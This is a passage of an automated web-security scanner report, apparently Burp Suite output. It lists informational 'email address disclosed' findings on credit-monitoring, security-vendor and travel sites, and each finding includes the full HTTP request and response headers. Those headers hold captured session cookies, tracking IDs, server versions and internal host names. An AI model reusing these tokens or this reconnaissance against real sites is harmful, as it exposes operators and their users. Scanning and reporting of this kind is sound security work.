Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=988332257; exp_last_activity=1303692257; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmb=226624333; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:13:34 GMT
Server: Apache
Set-Cookie: exp_last_activity=1303694014; expires=Mon, 23-Apr-2012 20:13:34 GMT; path=/
Set-Cookie: exp_tracker=a%3A2%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A1%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 20:13:34 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 32216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>ArcSight Express -
...[SNIP]...
<a href="mailto:website@arcsight.com">
...[SNIP]...
<a href="mailto:ArcSight-info@hp.com">ArcSight-info@hp.com</a>
...[SNIP]...

26.54. http://www.arcsight.com/products/products-identity/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /products/products-identity/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /products/products-identity/ HTTP/1.1
Host: www.arcsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:47:09 GMT
Server: Apache
Set-Cookie: exp_last_visit=988332429; expires=Mon, 23-Apr-2012 19:47:09 GMT; path=/
Set-Cookie: exp_last_activity=1303692429; expires=Mon, 23-Apr-2012 19:47:09 GMT; path=/
Set-Cookie: exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 19:47:09 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 27444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>ArcSight IdentityV
...[SNIP]...
<a href="mailto:website@arcsight.com">
...[SNIP]...
<a href="mailto:ArcSight-info@hp.com">ArcSight-info@hp.com</a>
...[SNIP]...

26.55. http://www.arcsight.com/supportportal/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arcsight.com
Path:   /supportportal/

Issue detail

The following email addresses were disclosed in the response:

Request

GET /supportportal/ HTTP/1.1
Host: www.arcsight.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: exp_last_visit=988332257; __utma=226624333.1483540328.1303674272.1303674272.1303674272.1; __utmc=226624333; __utmz=226624333.1303674272.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); _jsuid=3555580366436624596; __utmb=226624333; exp_last_activity=1303692410; exp_tracker=a%3A3%3A%7Bi%3A0%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A1%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A2%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:14:54 GMT
Server: Apache
Set-Cookie: exp_last_activity=1303694094; expires=Mon, 23-Apr-2012 20:14:54 GMT; path=/
Set-Cookie: exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A15%3A%22%2Fsupportportal%2F%22%3Bi%3A1%3Bs%3A6%3A%22%2Fblog%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Fproducts-esm%2Farcsight-express%2F%22%3Bi%3A3%3Bs%3A28%3A%22%2Fproducts%2Fproducts-identity%2F%22%3B%7D; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Sun, 24 Apr 2011 20:14:54 GMT
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 24303

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Welcome to the Arc
...[SNIP]...
<a href="mailto: support@arcsight.com">support@arcsight.com</a>
...[SNIP]...
<a href="mailto: escalation@arcsight.com">escalation@arcsight.com</a>
...[SNIP]...
<a href="mailto:website@arcsight.com">
...[SNIP]...
<a href="mailto:ArcSight-info@hp.com">ArcSight-info@hp.com</a>
...[SNIP]...

26.56. http://www.creditchecktotal.com/Message.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.creditchecktotal.com
Path:   /Message.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Message.aspx?PageTypeID=Contact%20Us&nav=false&WT.svl=contact&SiteVersionID=693&SiteID=100244&sc=668032&bcd=TotalCompare HTTP/1.1
Host: www.creditchecktotal.com
Proxy-Connection: keep-alive
Referer: http://www.creditchecktotal.com/default.aspx?sc=668032&bcd=TotalCompare
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=whbgr034pldyk3irdmpf0155; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=default; LastVisitDate=4/24/2011 1:44:31 PM; NavFlowID=; NumTrialDaysLeft=; UID=cf0a6e23928a43479df1fd6afa35c72f; BIGipServercreditchecktotal-web-pool=175001098.22559.0000

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=default+Message?PageTypeID=Contact Us; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 1:44:56 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Sun, 24 Apr 2011 20:44:56 GMT
ETag: "pvfe9d2b00fcaf09263bb51ba6370806e0"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.U314C3AC5].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 4534

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...
<a href="mailto:help@creditchecktotal.com">help@creditchecktotal.com</a>
...[SNIP]...

26.57. https://www.creditchecktotal.com/Message.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.creditchecktotal.com
Path:   /Message.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /Message.aspx?PageTypeID=SessionTimeOut HTTP/1.1
Host: www.creditchecktotal.com
Connection: keep-alive
Referer: https://www.creditchecktotal.com/Order1.aspx?areaid=22&pkgid=X2THZ&SiteVersionID=752&SiteID=100244&sc=669023&bcd=EYypxrx2
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=cf0a6e23928a43479df1fd6afa35c72f; MachineName=IRC-P2WEB-10; OriginalReferrer=; NavigationPath=Default; LastVisitDate=4/24/2011 1:45:13 PM; NavFlowID=; NumTrialDaysLeft=; UID=d4d0a4af417e4b0abab60afe27705d90; ASP.NET_SessionId=mgl24145ujchaomvjiwt5n55; MachineName=; NavFlowID=; NumTrialDaysLeft=; BIGipServercreditchecktotal-web-pool=175263242.22559.0000; OriginalReferrer=creditchecktotal.com; NavigationPath=default+s_code.axd+Order1+s_code.axd; LastVisitDate=4/24/2011 5:39:44 PM; mbox=session#1303691685768-21127#1303693858|PC#1303691685768-21127.17#1304901598|check#true#1303692058; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303691693040'%255D%255D%7C1461544493040%3B%20sc_cidstack%3D%255B%255B'669023_EYypxrx2'%252C'1303691693047'%255D%255D%7C1461544493047%3B%20s_lv%3D1303691998116%7C1398299998116%3B%20s_lv_s%3DFirst%2520Visit%7C1303693798116%3B%20sc_dl%3D1%7C1303693798353%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.creditchecktotal.com%252FOrder1.aspx%253Fareaid%253D22%2526pkgid%253DX2THZ%2526SiteVersionID%253D752%2526SiteID%253D100244%2526sc%253D669023%2526bcd%253DEYypxrx2%7C1303693798375%3B%20gpv_PN%3D100244%253Aorder1.aspx%7C1303693798416%3B; s_sess=%20ttc%3D1303691986229%3B%20c_m%3Dundefined669023_EYypxrx2undefined%3B%20s_cc%3Dtrue%3B%20sc_cp_channel%3D0%3B%20sc_gvl_sc%3D669023%3B%20sc_gvl_bcd%3Deyypxrx2%3B%20SC_LINKS%3D%3B%20s_sq%3Dexpiglobal%252Cexpicctlive%253D%252526pid%25253D100244%2525253Aorder1.aspx%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257BtoggleDisplay('previousAddress_tblTogglePreviousAddress'%2525252Cfalse)%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Connection: keep-alive
Set-Cookie: OriginalReferrer=creditchecktotal.com; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: NavigationPath=Order1+Error+Order1+Error+Order1+Message?PageTypeID=SessionTimeOut; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Set-Cookie: LastVisitDate=4/24/2011 6:36:24 PM; domain=www.creditchecktotal.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Apr 2011 01:36:24 GMT
ETag: "pv0d6f85543721bcb1e56684a924a43550"
Expires: -1
Cache-Control: no-cache
Pragma: no-cache
X-PvInfo: [S10203.C64259.A70594.RA0.G11457.UD1BD9B5].[OT/html.OG/pages]
Vary: Accept-Encoding
Accept-Ranges: none
Content-Length: 11103

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           CreditCheck(R) Total
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <met
...[SNIP]...
<a href="mailto:help@creditchecktotal.com">help@creditchecktotal.com</a>
...[SNIP]...

26.58. http://www.customscoop.com/wp-content/plugins/powerpress/player.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.customscoop.com
Path:   /wp-content/plugins/powerpress/player.js

Issue detail

The following email address was disclosed in the response:

Request

GET /wp-content/plugins/powerpress/player.js HTTP/1.1
Host: www.customscoop.com
Proxy-Connection: keep-alive
Referer: http://www.customscoop.com/free-trial?ctt_id=8402315&ctt_adnw=Google&ctt_ch=ps&ctt_entity=tc&ctt_cli=8x16337x264583x1756421&ctt_kw=reputation%20monitoring&ctt_adid=6182319610&ctt_nwtype=search&_kk=reputation%20monitoring&_kt=95b73c39-c203-439c-bdad-698c73ef9306&gclid=CKah4dm1tqgCFQFM5QodD3KkCw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:33:33 GMT
Server: Apache
Last-Modified: Mon, 17 Jan 2011 18:52:53 GMT
ETag: "2e21c08-2cf2-49a0f4a9414e0"
Accept-Ranges: bytes
Content-Length: 11506
Content-Type: application/x-javascript

/**
* jsMediaPlayer 1.2.0 for Blubrry PowerPress
*
* http://www.blubrry.com/powepress/
*
* Copyright (c) 2008-2009 Angelo Mandato (angelo [at] mandato {period} com)
*
* Released under Aoache
...[SNIP]...
true; // let the default link to the media open...
}

/**
* flashembed 0.31. Adobe Flash embedding script
*
* http://flowplayer.org/tools/flash-embed.html
*
* Copyright (c) 2008 Tero Piirainen (tipiirai@gmail.com)
*
* Released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
*
* >
...[SNIP]...

26.59. http://www.discountasp.net/tfs/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discountasp.net
Path:   /tfs/

Issue detail

The following email address was disclosed in the response:

Request

GET /tfs/ HTTP/1.1
Host: www.discountasp.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=qcipgv45ri0zgf3qhp4uir45; safe_cookie21=v=1&i=15253&l=RSTFSASPNTRON728PUR&lp=152&d=634392322327338546&r=&ip=2915161843; safe_cookie22=v=1&i=15253&l=RSTFSASPNTRON728PUR&lp=152&d=634392322327338546&r=&ip=2915161843

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 24 Apr 2011 15:57:12 GMT
Content-Length: 13637


   <html>

<head>
<title>Hosted TFS, Team Foundation Server Hosting, TFS 2010 Basic SaaS Solution</title>
   <META NAME="description" CONTENT="Team Foundation Server Hosting, TFS Hosting, So
...[SNIP]...
<font face="verdana" color="white" size="3">sales@discountasp.net</font>
...[SNIP]...

26.60. http://www.echomail.com/js/oodomimagerollover.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.echomail.com
Path:   /js/oodomimagerollover.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/oodomimagerollover.js HTTP/1.1
Host: www.echomail.com
Proxy-Connection: keep-alive
Referer: http://www.echomail.com/pricing/pricing_sm.asp
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20441063.1303692234.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=20441063.944278103.1303692234.1303692234.1303692234.1; __utmc=20441063; __utmb=20441063.3.10.1303692234; ASPSESSIONIDAQTTABCB=NILNDKCCCHDHEAFNBDBMBDBM

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sat, 08 Jan 2011 12:32:15 GMT
Accept-Ranges: bytes
ETag: "8071a71430afcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Mon, 25 Apr 2011 00:44:09 GMT
Content-Length: 3800

/*
   Header Information------------------------------------[Do Not Remove This Header]--
   Title: OO Dom Image Rollover
   Description: This script makes it easy to add rollover/ mousedown
   effects to
...[SNIP]...
including image submit buttons. Automatically
   preloads images as well. Script works in all DOM capable browsers- IE5+, NS6+,
   Opera7+.
   
   Legal: Copyright 2005 Adam Smith
   Author Email Address: ibulwark@hotmail.com
   Date Created: June 6, 2005
   Website: Codevendor.com | eBadgeman.com
   Script featured on Dynamic Drive: http://www.dynamicdrive.com
   -------------------------------------------------------------------
...[SNIP]...

26.61. http://www.equifax.com/siteAssets/Learn/js/omtr_code_prod.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.equifax.com
Path:   /siteAssets/Learn/js/omtr_code_prod.js

Issue detail

The following email address was disclosed in the response:

Request

GET /siteAssets/Learn/js/omtr_code_prod.js HTTP/1.1
Host: www.equifax.com
Proxy-Connection: keep-alive
Referer: http://equifax.com/free30daytrial/?CMP=KNC-Google&HBX_PK=credit_monitoring_service&HBX_OU=50&gclid=CNf214_1tagCFeM85Qod4FaqEA
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: hbx.hc2=CJ; hbx.hc3=null; hbx.timestamp=1303614816593

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sun, 24 Apr 2011 19:44:39 GMT
Content-length: 30329
Content-type: application/x-javascript
Last-modified: Thu, 18 Mar 2010 21:57:08 GMT
Etag: "7679-4ba2a1b4"
Accept-ranges: bytes

/* SiteCatalyst code version: H.17.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */

var s_account="equifaxprod,equifaxglobal"
var omtr=s_gi(s_account)
/****
...[SNIP]...
hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L
...[SNIP]...

26.62. https://www.experiandirect.com/triplealert/Message.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.experiandirect.com
Path:   /triplealert/Message.aspx

Issue detail

The following email address was disclosed in the response:

Request

GET /triplealert/Message.aspx?PageTypeID=SessionTimeOut HTTP/1.1
Host: www.experiandirect.com
Connection: keep-alive
Referer: https://www.experiandirect.com/triplealert/Order1.aspx?areaid=22&pkgid=BCZ1Y&SiteVersionID=473&SiteID=100173&sc=668715&bcd=
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSASDRQAB=CDHBNJACJBCIBIMLFEDPMNED; BIGipServerexperiandirect-web-pool=175394314.27679.0000; ASP.NET_SessionId=coygyj55nspn2hy5hekqo5bx; s_pers=%20sc_chstack%3D%255B%255B'Paid%252520Non-Search'%252C'1303674402602'%255D%255D%7C1461527202602%3B%20sc_cidstack%3D%255B%255B'668715'%252C'1303674402604'%255D%255D%7C1461527202604%3B%20s_lv%3D1303674590959%7C1398282590959%3B%20s_lv_s%3DFirst%2520Visit%7C1303676390959%3B%20sc_dl%3D1%7C1303676391021%3B%20gpv_p50%3Dhttps%253A%252F%252Fwww.experiandirect.com%252Ftriplealert%252FOrder1.aspx%253Fareaid%253D22%2526pkgid%253DBCZ1Y%2526SiteVersionID%253D473%2526SiteID%253D100173%2526sc%253D668715%2526bcd%253D%7C1303676391080%3B%20gpv_PN%3D100173%253Atriplealert%253Aorder1.aspx%7C1303676391140%3B; s_sess=%20c_m%3Dundefined668715undefined%3B%20ttc%3D1303674572839%3B%20sc_cp_channel%3D0%3B%20s_cc%3Dtrue%3B%20sc_gvl_sc%3D668715%3B%20sc_gvl_bcd%3D0%3B%20SC_LINKS%3D%3B%20s_sq%3Dexpiglobal%252Cexpitriplealertlive%253D%252526pid%25253D100173%2525253Atriplealert%2525253Aorder1.aspx%252526pidt%25253D1%252526oid%25253Dfunctiononclick(event)%2525257BtoggleDisplay('previousAddress_tblTogglePreviousAddress'%2525252Cfalse)%2525253B%2525257D%252526oidt%25253D2%252526ot%25253DRADIO%3B

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 20:27:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Pragma: no-cache
Set-Cookie: OriginalReferrer=experiandirect.com/triplealert; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: MachineName=IRC-P2WEB-16; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: NavigationPath=Message?PageTypeID=SessionTimeOut+s_code.axd+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Error+Order1+Message?PageTypeID=SessionTimeOut; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: LastVisitDate=4/24/2011 1:27:29 PM; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Set-Cookie: UID=f7dcb47c1df0490c9c9543b65f582e1a; domain=www.experiandirect.com; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/TRIPLEALERT/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 10179

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
   <head>
       <title>
           TripleAlert.com
       </title>
       <meta name="GENERATOR" Content="Microsoft Visual Studio 7.0">
       <meta nam
...[SNIP]...
<a href="mailto:support@experiandirect.com">support@experiandirect.com</a>
...[SNIP]...

26.63. http://www.fightidentitytheft.com/sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/modules/nice_menus/superfish/js/jquery.hoverIntent.minified.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:31 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Last-Modified: Thu, 01 Apr 2010 15:10:43 GMT
ETag: "e84ae3-649-4832e443682c0"
Accept-Ranges: bytes
Content-Length: 1609
Cache-Control: max-age=1209600
Expires: Sun, 08 May 2011 19:46:31 GMT
Content-Type: application/javascript

.../**
* hoverIntent r5 // 2007.03.27 // jQuery 1.1.2+
* <http://cherne.net/brian/resources/jquery.hoverIntent.html>
*
* @param f onMouseOver function || An object with configuration options
* @par
...[SNIP]...
<brian@cherne.net>
...[SNIP]...

26.64. http://www.fightidentitytheft.com/sites/all/themes/fightid/jquery.domec.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fightidentitytheft.com
Path:   /sites/all/themes/fightid/jquery.domec.js

Issue detail

The following email address was disclosed in the response:

Request

GET /sites/all/themes/fightid/jquery.domec.js?i HTTP/1.1
Host: www.fightidentitytheft.com
Proxy-Connection: keep-alive
Referer: http://www.fightidentitytheft.com/credit-monitoring.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SESSf331a4cfbd4fb71b2ae07bd5dd7990ca=c86cb732289f0cef2458e5c4f55e9bd7

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:46:40 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.12
Last-Modified: Fri, 15 Jan 2010 02:55:50 GMT
ETag: "db0e5f-656-47d2b24203980"
Accept-Ranges: bytes
Content-Length: 1622
Cache-Control: max-age=1209600
Expires: Sun, 08 May 2011 19:46:40 GMT
Content-Type: application/javascript

/**
* jQuery DOMEC (DOM Elements Creator) 0.3
*
* Copyright (c) 2008 Lukasz Rajchel (lukasz@rajchel.pl | http://lukasz.rajchel.pl)
* Dual licensed under the MIT (http://www.opensource.org/licenses/mit-license.php)
* and GPL (http://www.opensource.org/licenses/gpl-license.php) licenses.
*
* Syn
...[SNIP]...

26.65. http://www.hotelclub.com/Common/Scripts/s_code_HC.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hotelclub.com
Path:   /Common/Scripts/s_code_HC.js

Issue detail

The following email address was disclosed in the response:

Request

GET /Common/Scripts/s_code_HC.js HTTP/1.1
Host: www.hotelclub.com
Proxy-Connection: keep-alive
Referer: http://www.hotelclub.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: HTC=AppVer=1%2E0; anon=1129876971252011042422094; ASPSESSIONIDCCQRQCTQ=FDCOCPBANKNGOIFKLDNNOFAM; NSC_JOj4vajjejllb1veb0r04rbl5rcbheu=ffffffff09d7273245525d5f4f58455e445a4a422974

Response

HTTP/1.1 200 OK
Cteonnt-Length: 18552
Content-Type: application/x-javascript
Last-Modified: Tue, 23 Mar 2010 02:55:02 GMT
Accept-Ranges: bytes
ETag: "7042ab3b34caca1:fbf"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DEVa TAIa OUR BUS UNI"
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: private, max-age=54876
Date: Sun, 24 Apr 2011 12:09:45 GMT
Connection: close
